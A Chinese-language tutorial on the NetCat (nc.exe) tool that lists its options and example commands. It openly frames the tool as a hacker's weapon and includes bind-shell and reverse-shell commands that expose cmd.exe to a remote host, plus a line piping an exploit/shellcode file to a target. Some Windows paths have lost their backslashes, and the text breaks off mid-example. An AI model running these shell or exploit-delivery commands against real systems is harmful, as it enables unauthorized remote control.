瑞士军刀NC与使用教程.docx

瑞士军刀 NC 下载与使用教程 nc.exe 全称 NetCat,被誉为网络安全界的”瑞士军刀”.nc.exe 是一个格外标准的 telnet 客户端工具, 正由于它的强大功能使得它在入侵时被广泛应用,成为黑客们的必备武器之一. 我把最近收集的 nc.exe 的使用方法整理了一下,发给大家. 另外还找到了一款改编后的可视化的 nc,也供给应大家. ======================================================== 软件介绍： 工具名：Netcat Hobbit Chris Wysopal 类别：开放源码 平台：Linux/BSD/Unix/Windows WINDOWS 下版本号：[v1.10 NT] ======================================================== 参数介绍： *nc.exe -h*即可看到各参数的使用方法。 根本格式：nc [-options] hostname port[s] [ports] ? nc -l -p port [options] [hostname] [port] -d 后台模式 -e prog 程序重定向，一旦连接，就执行 [危急!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ? -h 帮助信息 -i secs 延时的间隔 -l 监听模式，用于入站连接 -L 连接关闭后,仍旧连续监听 -n 指定数字的 IP 地址，不能用 hostname -o file 记录 16 进制的传输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用 TELNET 交互方式 -u UDP 模式 -v 具体输出–用两个-v 可得到更具体的内容 -w secs timeout 的时间 -z 将输入输出关掉–用于扫描时 端口的表示方法可写为 M-N 的范围格式。 ======================================================== 根本用法： 连接到 REMOTE 主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到 192.168.x.x 的 TCP80 端口 监听 LOCAL 主机，例子： 格式：nc -l -p 80 讲解：监听本机的 TCP80 端口 扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描 192.168.x.x 的 TCP80 到 TCP445 的全部端口 REMOTE 主机绑定 SHELL，例子： 格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解：绑定 REMOTE 主机的 CMDSHELL 在 REMOTE 主机的 TCP5354 端口 REMOTE 主机绑定 SHELL 并反向连接，例子： 格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解：绑定 REMOTE 主机的 CMDSHELL 并反向连接到 192.168.x.x 的 TCP5354 端口 以上为最根本的几种用法〔其实 NC 的用法还有很多， 当协作管道命令”|”与重定向命令””、””等等命令功能更强大??〕。 ======================================================== 高级用法： 作攻击程序用，例子： 格式 1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式 2：nc -nvv 192.168.x.x 80 c:exploit.txt 讲解：连接到 192.168.x.x 的 80 端口，并在其管道中发送*c:exploit.txt*的内容(两种格式确有一样的效果,真是有异曲同工之妙. 附：*c:exploit.txt*为 shellcode 等 作蜜罐用[1]，例子： 格式：nc -L -p 80 讲解：使用*-L*(留意 L 是大写)可以不停地监听某一个端口，直到 ctrl+c 为止 作蜜罐用[2]，例子： 格式：nc -L -p 80 c:log.txt 讲解：使用*-L*可以不停地监听某一个端口，直到ctrl+c 为止，同时把结果输出到*c:log.txt*中，假设把** 改为**即可以追加日志 附：*c:log.txt*为日志等 作蜜罐用[3]，例子： 格式 1：nc -L -p 80 c:honeypot.